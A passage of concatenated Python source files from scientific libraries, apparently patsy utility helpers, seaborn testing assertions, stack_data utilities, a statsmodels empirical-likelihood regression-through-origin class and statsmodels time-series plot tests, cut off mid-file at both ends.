# re-writing every repr function twice, once for regular repr and once for
# the pretty printer. So, here's an ugly fallback implementation that can be
# used unconditionally to implement __repr__ in terms of _pretty_repr_.
#
# Pretty printer docs:
# http://ipython.org/ipython-doc/dev/api/generated/IPython.lib.pretty.html
class _MiniPPrinter(object):
def __init__(self):
self._out = StringIO()
self.indentation = 0
def text(self, text):
self._out.write(text)
def breakable(self, sep=" "):
self._out.write(sep)
def begin_group(self, _, text):
self.text(text)
def end_group(self, _, text):
self.text(text)
def pretty(self, obj):
if hasattr(obj, "_repr_pretty_"):
obj._repr_pretty_(self, False)
else:
self.text(repr(obj))
def getvalue(self):
return self._out.getvalue()
def _mini_pretty(obj):
printer = _MiniPPrinter()
printer.pretty(obj)
return printer.getvalue()
def repr_pretty_delegate(obj):
# If IPython is already loaded, then might as well use it. (Most commonly
# this will occur if we are in an IPython session, but somehow someone has
# called repr() directly. This can happen for example if printing an
# container like a namedtuple that IPython lacks special code for
# pretty-printing.) But, if IPython is not already imported, we do not
# attempt to import it. This makes patsy itself faster to import (as of
# Nov. 2012 I measured the extra overhead from loading IPython as ~4
# seconds on a cold cache), it prevents IPython from automatically
# spawning a bunch of child processes (!) which may not be what you want
# if you are not otherwise using IPython, and it avoids annoying the
# pandas people who have some hack to tell whether you are using IPython
# in their test suite (see patsy bug #12).
if optional_dep_ok and "IPython" in sys.modules:
from IPython.lib.pretty import pretty
return pretty(obj)
else:
return _mini_pretty(obj)
def repr_pretty_impl(p, obj, args, kwargs=[]):
name = obj.__class__.__name__
p.begin_group(len(name) + 1, "%s(" % (name,))
started = [False]
def new_item():
if started[0]:
p.text(",")
p.breakable()
started[0] = True
for arg in args:
new_item()
p.pretty(arg)
for label, value in kwargs:
new_item()
p.begin_group(len(label) + 1, "%s=" % (label,))
p.pretty(value)
p.end_group(len(label) + 1, "")
p.end_group(len(name) + 1, ")")
def test_repr_pretty():
assert repr_pretty_delegate("asdf") == "'asdf'"
printer = _MiniPPrinter()
class MyClass(object):
pass
repr_pretty_impl(printer, MyClass(),
["a", 1], [("foo", "bar"), ("asdf", "asdf")])
assert printer.getvalue() == "MyClass('a', 1, foo='bar', asdf='asdf')"
# In Python 3, objects of different types are not generally comparable, so a
# list of heterogeneous types cannot be sorted. This implements a Python 2
# style comparison for arbitrary types. (It works on Python 2 too, but just
# gives you the built-in ordering.) To understand why this is tricky, consider
# this example:
# a = 1 # type 'int'
# b = 1.5 # type 'float'
# class gggg:
# pass
# c = gggg()
# sorted([a, b, c])
# The fallback ordering sorts by class name, so according to the fallback
# ordering, we have b < c < a. But, of course, a and b are comparable (even
# though they're of different types), so we also have a < b. This is
# inconsistent. There is no general solution to this problem (which I guess is
# why Python 3 stopped trying), but the worst offender is all the different
# "numeric" classes (int, float, complex, decimal, rational...), so as a
# special-case, we sort all numeric objects to the start of the list.
# (In Python 2, there is also a similar special case for str and unicode, but
# we don't have to worry about that for Python 3.)
class SortAnythingKey(object):
def __init__(self, obj):
self.obj = obj
def _python_lt(self, other_obj):
# On Py2, < never raises an error, so this is just <. (Actually it
# does raise a TypeError for comparing complex to numeric, but not for
# comparisons of complex to other types. Sigh. Whatever.)
# On Py3, this returns a bool if available, and otherwise returns
# NotImplemented
try:
return self.obj < other_obj
except TypeError:
return NotImplemented
def __lt__(self, other):
assert isinstance(other, SortAnythingKey)
result = self._python_lt(other.obj)
if result is not NotImplemented:
return result
# Okay, that didn't work, time to fall back.
# If one of these is a number, then it is smaller.
if self._python_lt(0) is not NotImplemented:
return True
if other._python_lt(0) is not NotImplemented:
return False
# Also check ==, since it may well be defined for otherwise
# unorderable objects, and if so then we should be consistent with
# it:
if self.obj == other.obj:
return False
# Otherwise, we break ties based on class name and memory position
return ((self.obj.__class__.__name__, id(self.obj))
< (other.obj.__class__.__name__, id(other.obj)))
def test_SortAnythingKey():
assert sorted([20, 10, 0, 15], key=SortAnythingKey) == [0, 10, 15, 20]
assert sorted([10, -1.5], key=SortAnythingKey) == [-1.5, 10]
assert sorted([10, "a", 20.5, "b"], key=SortAnythingKey) == [10, 20.5, "a", "b"]
class a(object):
pass
class b(object):
pass
class z(object):
pass
a_obj = a()
b_obj = b()
z_obj = z()
o_obj = object()
assert (sorted([z_obj, a_obj, 1, b_obj, o_obj], key=SortAnythingKey)
== [1, a_obj, b_obj, o_obj, z_obj])
# NaN checking functions that work on arbitrary objects, on old Python
# versions (math.isnan is only in 2.6+), etc.
def safe_scalar_isnan(x):
try:
return np.isnan(float(x))
except (TypeError, ValueError, NotImplementedError):
return False
safe_isnan = np.vectorize(safe_scalar_isnan, otypes=[bool])
def test_safe_scalar_isnan():
assert not safe_scalar_isnan(True)
assert not safe_scalar_isnan(None)
assert not safe_scalar_isnan("sadf")
assert not safe_scalar_isnan((1, 2, 3))
assert not safe_scalar_isnan(np.asarray([1, 2, 3]))
assert not safe_scalar_isnan([np.nan])
assert safe_scalar_isnan(np.nan)
assert safe_scalar_isnan(np.float32(np.nan))
assert safe_scalar_isnan(float(np.nan))
def test_safe_isnan():
assert np.array_equal(safe_isnan([1, True, None, np.nan, "asdf"]),
[False, False, False, True, False])
assert safe_isnan(np.nan).ndim == 0
assert safe_isnan(np.nan)
assert not safe_isnan(None)
# raw isnan raises a *different* error for strings than for objects:
assert not safe_isnan("asdf")
def iterable(obj):
try:
iter(obj)
except Exception:
return False
return True
def test_iterable():
assert iterable("asdf")
assert iterable([])
assert iterable({"a": 1})
assert not iterable(1)
assert not iterable(iterable)
##### Handling Pandas's categorical stuff is horrible and hateful
# Basically they decided that they didn't like how numpy does things, so their
# categorical stuff is *kinda* like how numpy would do it (e.g. they have a
# special ".dtype" attribute to mark categorical data), so by default you'll
# find yourself using the same code paths to handle pandas categorical data
# and other non-categorical data. BUT, all the idioms for detecting
# categorical data blow up with errors if you try them with real numpy dtypes,
# and all numpy's idioms for detecting non-categorical types blow up with
# errors if you try them with pandas categorical stuff. So basically they have
# just poisoned all code that touches dtypes; the old numpy stuff is unsafe,
# and you must use special code like below.
#
# Also there are hoops to jump through to handle both the old style
# (Categorical objects) and new-style (Series with dtype="category").
# Needed to support pandas < 0.15
def pandas_Categorical_from_codes(codes, categories):
assert have_pandas_categorical
# Old versions of pandas sometimes fail to coerce this to an array and
# just return it directly from .labels (?!).
codes = np.asarray(codes)
if hasattr(pandas.Categorical, "from_codes"):
return pandas.Categorical.from_codes(codes, categories)
else:
return pandas.Categorical(codes, categories)
def test_pandas_Categorical_from_codes():
if not have_pandas_categorical:
return
c = pandas_Categorical_from_codes([1, 1, 0, -1], ["a", "b"])
assert np.all(np.asarray(c)[:-1] == ["b", "b", "a"])
assert np.isnan(np.asarray(c)[-1])
# Needed to support pandas < 0.15
def pandas_Categorical_categories(cat):
# In 0.15+, a categorical Series has a .cat attribute which is similar to
# a Categorical object, and Categorical objects are what have .categories
# and .codes attributes.
if hasattr(cat, "cat"):
cat = cat.cat
if hasattr(cat, "categories"):
return cat.categories
else:
return cat.levels
# Needed to support pandas < 0.15
def pandas_Categorical_codes(cat):
# In 0.15+, a categorical Series has a .cat attribute which is a
# Categorical object, and Categorical objects are what have .categories /
# .codes attributes.
if hasattr(cat, "cat"):
cat = cat.cat
if hasattr(cat, "codes"):
return cat.codes
else:
return cat.labels
def test_pandas_Categorical_accessors():
if not have_pandas_categorical:
return
c = pandas_Categorical_from_codes([1, 1, 0, -1], ["a", "b"])
assert np.all(pandas_Categorical_categories(c) == ["a", "b"])
assert np.all(pandas_Categorical_codes(c) == [1, 1, 0, -1])
if have_pandas_categorical_dtype:
s = pandas.Series(c)
assert np.all(pandas_Categorical_categories(s) == ["a", "b"])
assert np.all(pandas_Categorical_codes(s) == [1, 1, 0, -1])
# Needed to support pandas >= 0.15 (!)
def safe_is_pandas_categorical_dtype(dt):
if not have_pandas_categorical_dtype:
return False
return _pandas_is_categorical_dtype(dt)
# Needed to support pandas >= 0.15 (!)
def safe_is_pandas_categorical(data):
if not have_pandas_categorical:
return False
if isinstance(data, pandas.Categorical):
return True
if hasattr(data, "dtype"):
return safe_is_pandas_categorical_dtype(data.dtype)
return False
def test_safe_is_pandas_categorical():
assert not safe_is_pandas_categorical(np.arange(10))
if have_pandas_categorical:
c_obj = pandas.Categorical(["a", "b"])
assert safe_is_pandas_categorical(c_obj)
if have_pandas_categorical_dtype:
s_obj = pandas.Series(["a", "b"], dtype="category")
assert safe_is_pandas_categorical(s_obj)
# Needed to support pandas >= 0.15 (!)
# Calling np.issubdtype on a pandas categorical will blow up -- the officially
# recommended solution is to replace every piece of code like
# np.issubdtype(foo.dtype, bool)
# with code like
# isinstance(foo.dtype, np.dtype) and np.issubdtype(foo.dtype, bool)
# or
# not pandas.is_categorical_dtype(foo.dtype) and issubdtype(foo.dtype, bool)
# We do the latter (with extra hoops) because the isinstance check is not
# safe. See
# https://github.com/pydata/pandas/issues/9581
# https://github.com/pydata/pandas/issues/9581#issuecomment-77099564
def safe_issubdtype(dt1, dt2):
if safe_is_pandas_categorical_dtype(dt1):
return False
return np.issubdtype(dt1, dt2)
def test_safe_issubdtype():
assert safe_issubdtype(int, np.integer)
assert safe_issubdtype(np.dtype(float), np.floating)
assert not safe_issubdtype(int, np.floating)
assert not safe_issubdtype(np.dtype(float), np.integer)
if have_pandas_categorical_dtype:
bad_dtype = pandas.Series(["a", "b"], dtype="category")
assert not safe_issubdtype(bad_dtype, np.integer)
def no_pickling(*args, **kwargs):
raise NotImplementedError(
"Sorry, pickling not yet supported. "
"See https://github.com/pydata/patsy/issues/26 if you want to "
"help.")
def assert_no_pickling(obj):
import pickle
import pytest
pytest.raises(NotImplementedError, pickle.dumps, obj)
# Use like:
# if safe_string_eq(constraints, "center"):
# ...
# where 'constraints' might be a string or an array. (If it's an array, then
# we can't use == becaues it might broadcast and ugh.)
def safe_string_eq(obj, value):
if isinstance(obj, six.string_types):
return obj == value
else:
return False
def test_safe_string_eq():
assert safe_string_eq("foo", "foo")
assert not safe_string_eq("foo", "bar")
if not six.PY3:
assert safe_string_eq(unicode("foo"), "foo")
assert not safe_string_eq(np.empty((2, 2)), "foo")
```
#### File: site-packages/seaborn/_testing.py
```python
import numpy as np
import matplotlib as mpl
from matplotlib.colors import to_rgb, to_rgba
from numpy.testing import assert_array_equal
LINE_PROPS = [
"alpha",
"color",
"linewidth",
"linestyle",
"xydata",
"zorder",
]
COLLECTION_PROPS = [
"alpha",
"edgecolor",
"facecolor",
"fill",
"hatch",
"linestyle",
"linewidth",
"paths",
"zorder",
]
BAR_PROPS = [
"alpha",
"edgecolor",
"facecolor",
"fill",
"hatch",
"height",
"linestyle",
"linewidth",
"xy",
"zorder",
]
def assert_colors_equal(a, b, check_alpha=True):
def handle_array(x):
if isinstance(x, np.ndarray):
if x.ndim > 1:
x = np.unique(x, axis=0).squeeze()
if x.ndim > 1:
raise ValueError("Color arrays must be 1 dimensional")
return x
a = handle_array(a)
b = handle_array(b)
f = to_rgba if check_alpha else to_rgb
assert f(a) == f(b)
def assert_artists_equal(list1, list2, properties):
assert len(list1) == len(list2)
for a1, a2 in zip(list1, list2):
prop1 = a1.properties()
prop2 = a2.properties()
for key in properties:
v1 = prop1[key]
v2 = prop2[key]
if key == "paths":
for p1, p2 in zip(v1, v2):
assert_array_equal(p1.vertices, p2.vertices)
assert_array_equal(p1.codes, p2.codes)
elif isinstance(v1, np.ndarray):
assert_array_equal(v1, v2)
elif key == "color":
v1 = mpl.colors.to_rgba(v1)
v2 = mpl.colors.to_rgba(v2)
assert v1 == v2
else:
assert v1 == v2
def assert_legends_equal(leg1, leg2):
assert leg1.get_title().get_text() == leg2.get_title().get_text()
for t1, t2 in zip(leg1.get_texts(), leg2.get_texts()):
assert t1.get_text() == t2.get_text()
assert_artists_equal(
leg1.get_patches(), leg2.get_patches(), BAR_PROPS,
)
assert_artists_equal(
leg1.get_lines(), leg2.get_lines(), LINE_PROPS,
)
def assert_plots_equal(ax1, ax2, labels=True):
assert_artists_equal(ax1.patches, ax2.patches, BAR_PROPS)
assert_artists_equal(ax1.lines, ax2.lines, LINE_PROPS)
poly1 = ax1.findobj(mpl.collections.PolyCollection)
poly2 = ax2.findobj(mpl.collections.PolyCollection)
assert_artists_equal(poly1, poly2, COLLECTION_PROPS)
if labels:
assert ax1.get_xlabel() == ax2.get_xlabel()
assert ax1.get_ylabel() == ax2.get_ylabel()
```
#### File: site-packages/stack_data/utils.py
```python
import ast
import itertools
import types
from collections import OrderedDict, Counter, defaultdict
from types import FrameType, TracebackType
from typing import (
Iterator, List, Tuple, Iterable, Callable, Union,
TypeVar, Mapping,
)
T = TypeVar('T')
R = TypeVar('R')
def truncate(seq, max_length: int, middle):
if len(seq) > max_length:
right = (max_length - len(middle)) // 2
left = max_length - len(middle) - right
seq = seq[:left] + middle + seq[-right:]
return seq
def unique_in_order(it: Iterable[T]) -> List[T]:
return list(OrderedDict.fromkeys(it))
def line_range(node: ast.AST) -> Tuple[int, int]:
"""
Returns a pair of numbers representing a half open range
(i.e. suitable as arguments to the `range()` builtin)
of line numbers of the given AST nodes.
"""
try:
return (
node.first_token.start[0],
node.last_token.end[0] + 1,
)
except AttributeError:
return (
node.lineno,
getattr(node, "end_lineno", node.lineno) + 1,
)
def highlight_unique(lst: List[T]) -> Iterator[Tuple[T, bool]]:
counts = Counter(lst)
for is_common, group in itertools.groupby(lst, key=lambda x: counts[x] > 3):
if is_common:
group = list(group)
highlighted = [False] * len(group)
def highlight_index(f):
try:
i = f()
except ValueError:
return None
highlighted[i] = True
return i
for item in set(group):
first = highlight_index(lambda: group.index(item))
if first is not None:
highlight_index(lambda: group.index(item, first + 1))
highlight_index(lambda: -1 - group[::-1].index(item))
else:
highlighted = itertools.repeat(True)
yield from zip(group, highlighted)
def identity(x: T) -> T:
return x
def collapse_repeated(lst, *, collapser, mapper=identity, key=identity):
keyed = list(map(key, lst))
for is_highlighted, group in itertools.groupby(
zip(lst, highlight_unique(keyed)),
key=lambda t: t[1][1],
):
original_group, highlighted_group = zip(*group)
if is_highlighted:
yield from map(mapper, original_group)
else:
keyed_group, _ = zip(*highlighted_group)
yield collapser(list(original_group), list(keyed_group))
def is_frame(frame_or_tb: Union[FrameType, TracebackType]) -> bool:
assert_(isinstance(frame_or_tb, (types.FrameType, types.TracebackType)))
return isinstance(frame_or_tb, (types.FrameType,))
def iter_stack(frame_or_tb: Union[FrameType, TracebackType]) -> Iterator[Union[FrameType, TracebackType]]:
while frame_or_tb:
yield frame_or_tb
if is_frame(frame_or_tb):
frame_or_tb = frame_or_tb.f_back
else:
frame_or_tb = frame_or_tb.tb_next
def frame_and_lineno(frame_or_tb: Union[FrameType, TracebackType]) -> Tuple[FrameType, int]:
if is_frame(frame_or_tb):
return frame_or_tb, frame_or_tb.f_lineno
else:
return frame_or_tb.tb_frame, frame_or_tb.tb_lineno
def group_by_key_func(iterable: Iterable[T], key_func: Callable[[T], R]) -> Mapping[R, List[T]]:
# noinspection PyUnresolvedReferences
"""
Create a dictionary from an iterable such that the keys are the result of evaluating a key function on elements
of the iterable and the values are lists of elements all of which correspond to the key.
>>> def si(d): return sorted(d.items())
>>> si(group_by_key_func("a bb ccc d ee fff".split(), len))
[(1, ['a', 'd']), (2, ['bb', 'ee']), (3, ['ccc', 'fff'])]
>>> si(group_by_key_func([-1, 0, 1, 3, 6, 8, 9, 2], lambda x: x % 2))
[(0, [0, 6, 8, 2]), (1, [-1, 1, 3, 9])]
"""
result = defaultdict(list)
for item in iterable:
result[key_func(item)].append(item)
return result
class cached_property(object):
"""
A property that is only computed once per instance and then replaces itself
with an ordinary attribute. Deleting the attribute resets the property.
Based on https://github.com/pydanny/cached-property/blob/master/cached_property.py
"""
def __init__(self, func):
self.__doc__ = func.__doc__
self.func = func
def cached_property_wrapper(self, obj, _cls):
if obj is None:
return self
value = obj.__dict__[self.func.__name__] = self.func(obj)
return value
__get__ = cached_property_wrapper
def _pygmented_with_ranges(formatter, code, ranges):
import pygments
from pygments.lexers import get_lexer_by_name
class MyLexer(type(get_lexer_by_name("python3"))):
def get_tokens(self, text):
length = 0
for ttype, value in super().get_tokens(text):
if any(start <= length < end for start, end in ranges):
ttype = ttype.ExecutingNode
length += len(value)
yield ttype, value
lexer = MyLexer(stripnl=False)
return pygments.highlight(code, lexer, formatter).splitlines()
def assert_(condition, error=""):
if not condition:
if isinstance(error, str):
error = AssertionError(error)
raise error
```
#### File: statsmodels/emplike/originregress.py
```python
import numpy as np
from scipy import optimize
from scipy.stats import chi2
from statsmodels.regression.linear_model import OLS, RegressionResults
# When descriptive merged, this will be changed
from statsmodels.tools.tools import add_constant
class ELOriginRegress(object):
"""
Empirical Likelihood inference and estimation for linear regression
through the origin.
Parameters
----------
endog: nx1 array
Array of response variables.
exog: nxk array
Array of exogenous variables. Assumes no array of ones
Attributes
----------
endog : nx1 array
Array of response variables
exog : nxk array
Array of exogenous variables. Assumes no array of ones.
nobs : float
Number of observations.
nvar : float
Number of exogenous regressors.
"""
def __init__(self, endog, exog):
self.endog = endog
self.exog = exog
self.nobs = self.exog.shape[0]
try:
self.nvar = float(exog.shape[1])
except IndexError:
self.nvar = 1.
def fit(self):
"""
Fits the model and provides regression results.
Returns
-------
Results : class
Empirical likelihood regression class.
"""
exog_with = add_constant(self.exog, prepend=True)
restricted_model = OLS(self.endog, exog_with)
restricted_fit = restricted_model.fit()
restricted_el = restricted_fit.el_test(
np.array([0]), np.array([0]), ret_params=1)
params = np.squeeze(restricted_el[3])
beta_hat_llr = restricted_el[0]
llf = np.sum(np.log(restricted_el[2]))
return OriginResults(restricted_model, params, beta_hat_llr, llf)
def predict(self, params, exog=None):
if exog is None:
exog = self.exog
return np.dot(add_constant(exog, prepend=True), params)
class OriginResults(RegressionResults):
"""
A Results class for empirical likelihood regression through the origin.
Parameters
----------
model : class
An OLS model with an intercept.
params : 1darray
Fitted parameters.
est_llr : float
The log likelihood ratio of the model with the intercept restricted to
0 at the maximum likelihood estimates of the parameters.
llr_restricted/llr_unrestricted
llf_el : float
The log likelihood of the fitted model with the intercept restricted to 0.
Attributes
----------
model : class
An OLS model with an intercept.
params : 1darray
Fitted parameter.
llr : float
The log likelihood ratio of the maximum empirical likelihood estimate.
llf_el : float
The log likelihood of the fitted model with the intercept restricted to 0.
Notes
-----
IMPORTANT. Since EL estimation does not drop the intercept parameter but
instead estimates the slope parameters conditional on the slope parameter
being 0, the first element for params will be the intercept, which is
restricted to 0.
IMPORTANT. This class inherits from RegressionResults but inference is
conducted via empirical likelihood. Therefore, any methods that
require an estimate of the covariance matrix will not function. Instead
use el_test and conf_int_el to conduct inference.
Examples
--------
>>> import statsmodels.api as sm
>>> data = sm.datasets.bc.load()
>>> model = sm.emplike.ELOriginRegress(data.endog, data.exog)
>>> fitted = model.fit()
>>> fitted.params # 0 is the intercept term.
array([ 0. , 0.00351813])
>>> fitted.el_test(np.array([.0034]), np.array([1]))
(3.6696503297979302, 0.055411808127497755)
>>> fitted.conf_int_el(1)
(0.0033971871114706867, 0.0036373150174892847)
# No covariance matrix so normal inference is not valid
>>> fitted.conf_int()
TypeError: unsupported operand type(s) for *: 'instancemethod' and 'float'
"""
def __init__(self, model, params, est_llr, llf_el):
self.model = model
self.params = np.squeeze(params)
self.llr = est_llr
self.llf_el = llf_el
def el_test(self, b0_vals, param_nums, method='nm',
stochastic_exog=1, return_weights=0):
"""
Returns the llr and p-value for a hypothesized parameter value
for a regression that goes through the origin.
Parameters
----------
b0_vals : 1darray
The hypothesized value to be tested.
param_num : 1darray
Which parameters to test. Note this uses python
indexing but the '0' parameter refers to the intercept term,
which is assumed 0. Therefore, param_num should be > 0.
return_weights : bool
If true, returns the weights that optimize the likelihood
ratio at b0_vals. Default is False.
method : str
Can either be 'nm' for Nelder-Mead or 'powell' for Powell. The
optimization method that optimizes over nuisance parameters.
Default is 'nm'.
stochastic_exog : bool
When TRUE, the exogenous variables are assumed to be stochastic.
When the regressors are nonstochastic, moment conditions are
placed on the exogenous variables. Confidence intervals for
stochastic regressors are at least as large as non-stochastic
regressors. Default is TRUE.
Returns
-------
res : tuple
pvalue and likelihood ratio.
"""
b0_vals = np.hstack((0, b0_vals))
param_nums = np.hstack((0, param_nums))
test_res = self.model.fit().el_test(b0_vals, param_nums, method=method,
stochastic_exog=stochastic_exog,
return_weights=return_weights)
llr_test = test_res[0]
llr_res = llr_test - self.llr
pval = chi2.sf(llr_res, self.model.exog.shape[1] - 1)
if return_weights:
return llr_res, pval, test_res[2]
else:
return llr_res, pval
def conf_int_el(self, param_num, upper_bound=None,
lower_bound=None, sig=.05, method='nm',
stochastic_exog=1):
"""
Returns the confidence interval for a regression parameter when the
regression is forced through the origin.
Parameters
----------
param_num : int
The parameter number to be tested. Note this uses python
indexing but the '0' parameter refers to the intercept term.
upper_bound : float
The maximum value the upper confidence limit can be. The
closer this is to the confidence limit, the quicker the
computation. Default is .00001 confidence limit under normality.
lower_bound : float
The minimum value the lower confidence limit can be.
Default is .00001 confidence limit under normality.
sig : float, optional
The significance level. Default .05.
method : str, optional
Algorithm to optimize of nuisance params. Can be 'nm' or
'powell'. Default is 'nm'.
Returns
-------
ci: tuple
The confidence interval for the parameter 'param_num'.
"""
r0 = chi2.ppf(1 - sig, 1)
param_num = np.array([param_num])
if upper_bound is None:
upper_bound = (np.squeeze(self.model.fit().
conf_int(.0001)[param_num])[1])
if lower_bound is None:
lower_bound = (np.squeeze(self.model.fit().conf_int(.00001)
[param_num])[0])
f = lambda b0: self.el_test(np.array([b0]), param_num,
method=method,
stochastic_exog=stochastic_exog)[0] - r0
lowerl = optimize.brentq(f, lower_bound, self.params[param_num])
upperl = optimize.brentq(f, self.params[param_num], upper_bound)
return (lowerl, upperl)
```
#### File: graphics/tests/test_tsaplots.py
```python
from statsmodels.compat.python import lmap
import calendar
from io import BytesIO
import locale
import numpy as np
from numpy.testing import assert_, assert_equal
import pandas as pd
import pytest
from statsmodels.datasets import elnino, macrodata
from statsmodels.graphics.tsaplots import (
month_plot,
plot_acf,
plot_pacf,
plot_predict,
quarter_plot,
seasonal_plot,
)
from statsmodels.tsa import arima_process as tsp
from statsmodels.tsa.ar_model import AutoReg
from statsmodels.tsa.arima.model import ARIMA
try:
from matplotlib import pyplot as plt
except ImportError:
pass
@pytest.mark.matplotlib
def test_plot_acf(close_figures):
# Just test that it runs.
fig = plt.figure()
ax = fig.add_subplot(111)
ar = np.r_[1.0, -0.9]
ma = np.r_[1.0, 0.9]
armaprocess = tsp.ArmaProcess(ar, ma)
rs = np.random.RandomState(1234)
acf = armaprocess.generate_sample(100, distrvs=rs.standard_normal)
plot_acf(acf, ax=ax, lags=10)
plot_acf(acf, ax=ax)
plot_acf(acf, ax=ax, alpha=None)
@pytest.mark.matplotlib
def test_plot_acf_irregular(close_figures):
# Just test that it runs.
fig = plt.figure()
ax = fig.add_subplot(111)
ar = np.r_[1.0, -0.9]
ma = np.r_[1.0, 0.9]
armaprocess = tsp.ArmaProcess(ar, ma)
rs = np.random.RandomState(1234)
acf = armaprocess.generate_sample(100, distrvs=rs.standard_normal)
plot_acf(acf, ax=ax, lags=np.arange(1, 11))
plot_acf(acf, ax=ax, lags=10, zero=False)
plot_acf(acf, ax=ax, alpha=None, zero=False)
@pytest.mark.matplotlib
def test_plot_pacf(close_figures):
# Just test that it runs.
fig = plt.figure()
ax = fig.add_subplot(111)
ar = np.r_[1.0, -0.9]
ma = np.r_[1.0, 0.9]
armaprocess = tsp.ArmaProcess(ar, ma)
rs = np.random.RandomState(1234)
pacf = armaprocess.generate_sample(100, distrvs=rs.standard_normal)
with pytest.warns(FutureWarning):
plot_pacf(pacf, ax=ax)
with pytest.warns(FutureWarning, match="The default"):
plot_pacf(pacf, ax=ax, alpha=None)
@pytest.mark.matplotlib
def test_plot_pacf_kwargs(close_figures):
# Just test that it runs.
fig = plt.figure()
ax = fig.add_subplot(111)
ar = np.r_[1.0, -0.9]
ma = np.r_[1.0, 0.9]
armaprocess = tsp.ArmaProcess(ar, ma)
rs = np.random.RandomState(1234)
pacf = armaprocess.generate_sample(100, distrvs=rs.standard_normal)
buff = BytesIO()
with pytest.warns(FutureWarning, match="The default"):
plot_pacf(pacf, ax=ax)
fig.savefig(buff, format="rgba")
buff_linestyle = BytesIO()
fig_linestyle = plt.figure()
ax = fig_linestyle.add_subplot(111)
with pytest.warns(FutureWarning, match="The default"):
plot_pacf(pacf, ax=ax, ls="-")
fig_linestyle.savefig(buff_linestyle, format="rgba")
buff_with_vlines = BytesIO()
fig_with_vlines = plt.figure()
ax = fig_with_vlines.add_subplot(111)
vlines_kwargs = {"linestyles": "dashdot"}
with pytest.warns(FutureWarning, match="The default"):
plot_pacf(pacf, ax=ax, vlines_kwargs=vlines_kwargs)
fig_with_vlines.savefig(buff_with_vlines, format="rgba")
buff.seek(0)
buff_linestyle.seek(0)
buff_with_vlines.seek(0)
plain = buff.read()
linestyle = buff_linestyle.read()
with_vlines = buff_with_vlines.read()
assert_(plain != linestyle)
assert_(with_vlines != plain)
assert_(linestyle != with_vlines)
@pytest.mark.matplotlib
def test_plot_acf_kwargs(close_figures):
# Just test that it runs.
fig = plt.figure()
ax = fig.add_subplot(111)
ar = np.r_[1.0, -0.9]
ma = np.r_[1.0, 0.9]
armaprocess = tsp.ArmaProcess(ar, ma)
rs = np.random.RandomState(1234)
acf = armaprocess.generate_sample(100, distrvs=rs.standard_normal)
buff = BytesIO()
plot_acf(acf, ax=ax)
fig.savefig(buff, format="rgba")
buff_with_vlines = BytesIO()
fig_with_vlines = plt.figure()
ax = fig_with_vlines.add_subplot(111)
vlines_kwargs = {"linestyles": "dashdot"}
plot_acf(acf, ax=ax, vlines_kwargs=vlines_kwargs)
fig_with_vlines.savefig(buff_with_vlines, format="rgba")
buff.seek(0)
buff_with_vlines.seek(0)
plain = buff.read()
with_vlines = buff_with_vlines.read()
assert_(with_vlines != plain)
@pytest.mark.matplotlib
def test_plot_acf_missing(close_figures):
# Just test that it runs.
fig = plt.figure()
ax = fig.add_subplot(111)
ar = np.r_[1.0, -0.9]
ma = np.r_[1.0, 0.9]
armaprocess = tsp.ArmaProcess(ar, ma)
rs = np.random.RandomState(1234)
acf = armaprocess.generate_sample(100, distrvs=rs.standard_normal)
acf[::13] = np.nan
buff = BytesIO()
plot_acf(acf, ax=ax, missing="drop")
fig.savefig(buff, format="rgba")
buff.seek(0)
fig = plt.figure()
ax = fig.add_subplot(111)
buff_conservative = BytesIO()
plot_acf(acf, ax=ax, missing="conservative")
fig.savefig(buff_conservative, format="rgba")
buff_conservative.seek(0)
assert_(buff.read() != buff_conservative.read())
@pytest.mark.matplotlib
def test_plot_pacf_irregular(close_figures):
# Just test that it runs.
fig = plt.figure()
ax = fig.add_subplot(111)
ar = np.r_[1.0, -0.9]
ma = np.r_[1.0, 0.9]
armaprocess = tsp.ArmaProcess(ar, ma)
rs = np.random.RandomState(1234)
pacf = armaprocess.generate_sample(100, distrvs=rs.standard_normal)
with pytest.warns(FutureWarning, match="The default"):
plot_pacf(pacf, ax=ax, lags=np.arange(1, 11))
with pytest.warns(FutureWarning, match="The default"):
plot_pacf(pacf, ax=ax, lags=10, zero=False)
with pytest.warns(FutureWarning, match="The default"):
plot_pacf(pacf, ax=ax, alpha=None, zero=False)
@pytest.mark.matplotlib
def test_plot_month(close_figures):
dta = elnino.load_pandas().data
dta["YEAR"] = dta.YEAR.astype(int).apply(str)
dta = dta.set_index("YEAR").T.unstack()
dates = pd.to_datetime(["-".join([x[1], x[0]]) for x in dta.index.values])
# test dates argument
fig = month_plot(dta.values, dates=dates, ylabel="el nino")
# test with a TimeSeries DatetimeIndex with no freq
dta.index = pd.DatetimeIndex(dates)
fig = month_plot(dta)
# w freq
dta.index = pd.DatetimeIndex(dates, freq="MS")
fig = month_plot(dta)
# test with a TimeSeries PeriodIndex
dta.index = pd.PeriodIndex(dates, freq="M")
fig = month_plot(dta)
# test localized xlabels
try:
with calendar.different_locale("DE_de"):
fig = month_plot(dta)
labels = [_.get_text() for _ in fig.axes[0].get_xticklabels()]
expected = [
"Jan",
"Feb",
("Mär", "Mrz"),
"Apr",
"Mai",
"Jun",
"Jul",
"Aug",
"Sep",
"Okt",
"Nov",
"Dez",
]
for lbl, exp in zip(labels, expected):
if isinstance(exp, tuple):
assert lbl in exp
else:
assert lbl == exp
except locale.Error:
pytest.xfail(reason="Failure due to unsupported locale")
@pytest.mark.matplotlib
def test_plot_quarter(close_figures):
dta = macrodata.load_pandas().data
dates = lmap(
"Q".join,
zip(
dta.year.astype(int).apply(str), dta.quarter.astype(int).apply(str)
),
)
# test dates argument
quarter_plot(dta.unemp.values, dates)
# test with a DatetimeIndex with no freq
dta.set_index(pd.to_datetime(dates), inplace=True)
quarter_plot(dta.unemp)
# w freq
# see pandas #6631
dta.index = pd.DatetimeIndex(pd.to_datetime(dates), freq="QS-Oct")
quarter_plot(dta.unemp)
# w PeriodIndex
dta.index = pd.PeriodIndex(pd.to_datetime(dates), freq="Q")
quarter_plot(dta.unemp)
@pytest.mark.matplotlib
def test_seasonal_plot(close_figures):
rs = np.random.RandomState(1234)
data = rs.randn(20, 12)
data += 6 * np.sin(np.arange(12.0) / 11 * np.pi)[None, :]
data = data.ravel()
months = np.tile(np.arange(1, 13), (20, 1))
months = months.ravel()
df = pd.DataFrame([data, months], index=["data", "months"]).T
grouped = df.groupby("months")["data"]
labels = [
"Jan",
"Feb",
"Mar",
"Apr",
"May",
"Jun",
"Jul",
"Aug",
"Sep",
"Oct",
"Nov",
"Dec",
]
fig = seasonal_plot(grouped, labels)
ax = fig.get_axes()[0]
output = [tl.get_text() for tl in ax.get_xticklabels()]
assert_equal(labels, output)
@pytest.mark.matplotlib
@pytest.mark.parametrize(
"model_and_args",
